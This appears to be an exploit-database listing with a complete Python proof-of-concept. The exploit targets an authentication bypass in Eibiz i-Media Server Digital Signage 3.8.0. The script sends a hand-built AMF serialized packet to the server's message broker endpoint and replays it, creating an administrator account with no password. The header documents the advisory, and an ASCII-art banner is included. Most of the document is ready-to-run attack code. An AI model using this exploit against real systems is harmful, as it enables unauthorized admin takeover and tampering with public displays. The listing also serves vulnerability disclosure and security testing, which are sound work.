Exploit for Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass

Name: Exploit for Eibiz i-Media Server Digital Signage 3.8.0 Authentication Bypass
Rating: 5 (306 reviews)
2020-08-21 | CVSS 0.5
## https://sploitus.com/exploit?id=PACKETSTORM:158944
#!/usr/bin/env python3  
# -*- coding: utf-8 -*-  
#  
#  
# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin)  
#  
#  
# Vendor: EIBIZ Co.,Ltd.  
# Product web page: http://www.eibiz.co.th  
# Affected version: <=3.8.0  
#  
# Summary: EIBIZ develop advertising platform for out of home media in that  
# time the world called "Digital Signage". Because most business customers  
# still need get outside to get in touch which products and services. Online  
# media alone cannot serve them right place, right time.  
#  
# Desc: The application suffers from unauthenticated privilege escalation and  
# arbitrary user creation vulnerability that allows authentication bypass.  
# Once serialized, an AMF encoded object graph may be used to persist and retrieve  
# application state or allow two endpoints to communicate through the exchange  
# of strongly typed data. These objects are received by the server without validation  
# and authentication and gives the attacker the ability to create any user with  
# any role and bypass the security control in place and modify presented data on  
# the screen/billboard.  
#  
# =========================================================================================  
#  
# # python3 imedia_createUser.py 192.168.1.1 waddup  
#  
# --Sending serialized object...  
# --Replaying...  
#  
# ------------------------------------------------------  
# Admin user 'waddup' successfully created. No password.  
# ------------------------------------------------------  
#  
# =========================================================================================  
#  
# Tested on: Windows Server 2016  
# Windows Server 2012 R2  
# Windows Server 2008 R2  
# Apache Flex  
# Apache Tomcat/6.0.14  
# Apache-Coyote/1.1  
# BlazeDS Application  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2020-5586  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php  
#  
#  
# 26.07.2020  
#  
#  
  
import time as go  
import requests  
import sys  
import re  
  
class __CreateAdmin__:  
  
def __init__(self):  
self.ep = "/messagebroker/amf"  
self.agent = "CharlieChaplin"  
self.amfpacket = None  
self.bytecount = None  
self.bytesdata = None  
self.address = None  
self.headers = None  
self.usrname = None  
self.ende = None  
  
def usage(self):  
if len(sys.argv) != 3:  
self.me()  
msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin"  
brd = "-" * len(msg + "\x20")  
print("\n" + brd)  
print(msg)  
print("\x20Usage: ./i-media.py [ip] [username]")  
print(brd)  
exit(12)  
else:  
self.address = sys.argv[1]  
self.usrname = sys.argv[2]  
if not "http" in self.address:  
self.address = "http://{}".format(self.address)  
  
def amf(self):  
self.headers = {"User-Agent" : self.agent,  
"Accept" : "*/*",  
"Accept-Language" : "en-US,en;q=0.5",  
"Accept-Encoding" : "gzip, deflate",  
"Origin" : self.address,  
"Connection" : "close",  
"Referer" : self.address + "/main.swf",  
"Content-Type" : "application/x-amf"}  
  
self.amfpacket = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E"  
self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00"  
self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11"  
self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E"  
self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67"  
self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73"  
self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67"  
self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73"  
self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65"  
self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69"  
self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62"  
self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E"  
self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65"  
self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F"  
self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74"  
self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D"  
self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01"  
self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55"  
self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A"  
self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64"  
self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70"  
self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63"  
self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C"  
self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65"  
self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D"  
self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64"  
self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75"  
self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65"  
self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09"  
self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64"  
self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F"  
self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06"  
self.amfpacket += b"\x01\x06\x01\x06" ##################"  
self.bytecount = len(self.usrname * 2) + 1  
self.bytesdata = [self.bytecount]  
self.amfpacket += "".join(map(chr, self.bytesdata))  
self.amfpacket += (bytes(self.usrname.encode("utf-8")))  
self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06"  
self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69"  
self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06"  
self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44"  
self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74"  
self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09"  
self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42"  
self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31"  
self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31"  
self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33"  
self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00"  
self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72"  
self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46"  
self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38"  
self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41"  
self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45"  
self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########"  
  
print("\n--Sending serialized object...")  
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)  
#print(req.text.encode("utf-8"))  
go.sleep(2)  
print("--Replaying...")  
req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket)  
#print(req.text.encode("utf-8"))  
self.ende = "Admin user '" + self.usrname + "' successfully created. No password."  
print  
print("-" * len(self.ende))  
print(self.ende)  
print("-" * len(self.ende))  
  
def me(self):  
cc = """  
  
/`,.,,,.   
:.......,,   
,.........7   
,.........$   
......:=+=$   
I.....,,:~,.:   
$.?7IZDDNNN~.   
$$: 8D=:I D,   
D~,7NI7DNN   
DDD NNN:   
D8.ININ;   
D8?7DZS   
.ZDNNND D   
S..,.~8?,N OO77   
N......,..$=77:+?=~8   
:......,::=.I8?:+=.=+~++   
=.......,:+$=+O:+==~~++++=   
8...........~7D$::~..~====:++   
I.............:+.....~~~=~:~+?   
N,............. .+...,:~=+~~ :+=$   
;....... ......, .,....,:=+:,..~=?   
Z,,...... :............,::~~=...===I   
=.......$ Z...... =~,,,,.,:~,...,7~=   
+....... 8.....,.=~~~:.~~~=:~ ..:$==   
,...... +,..,,:.=~:~+I:,+I=8:...=?~   
,....., =...,,,8+=,:~=~I=~~ N...:+?   
,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=?   
8...... ,...7=Z$DN:?::=I~~$ =..,=+   
...,..D ,....O88D,8D,:=:==+?? ...,:7   
,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+   
......8D .. .... :?~8D:.:~~=++ ..,~II   
:....~D+: . . . ..,..==~===N +,.,=$   
,. DDND.......... .,...,===+=N ..,+?Z   
DD 88 .......... ....,..~+=~N ..,~?I   
....... ,,.,,.:...=?? 8..~=I$   
....... ...,,,,. ,:~= ..:=~?   
........ ,.,,..,:.. I.:+?+D   
....... .......,:,,8 ,..IN   
........ .,.. ..,,:.: :8N   
........ ... ..,::,, I+O   
........ ......,:,. O.ZN   
........ . . ...,,,,. D+   
............ ....,,,. =   
....... . ....,,, ?   
....... .....,,, 7   
...... . ..,,,, +   
:..... ..,.,, 8   
:....... =. .....,,,N 8   
~....... D. .....,,,D 8   
~....... D. . ...,,,O D   
=.... .....,,Z ?`   
+...... . :........,.$ +   
I...... ........,.7 =   
Z........ . . ....,,7 D   
N..... ... . ........I 8   
..... ... , ........I 8   
...... . = .. .....I 7   
:.. . ..7 8... .....I ?   
Z.. D .. ....7 N NND88OOOOOOO88DN   
O.. . .. ....O O D8OZ$77II777$$ZO8DN   
... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN   
.,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N   
$.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN   
... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N   
Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N   
=.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN   
... .?, I777IIIIIIIII7$~O8N NNNNN   
8.... .I. ...7IIIIII7$Z8DD NNNNN   
NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN   
N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN   
?,:..:,.=N I.....,,=I+ N8   
~....,8   
  
"""  
  
j = 0  
while j < len(cc):  
char = cc[j]  
sys.stdout.write(char)  
go.sleep(10.0 / 100000.0)  
j = j + 1  
  
def main(self):  
self.usage()  
self.amf()  
  
if __name__ == '__main__':  
__CreateAdmin__().main()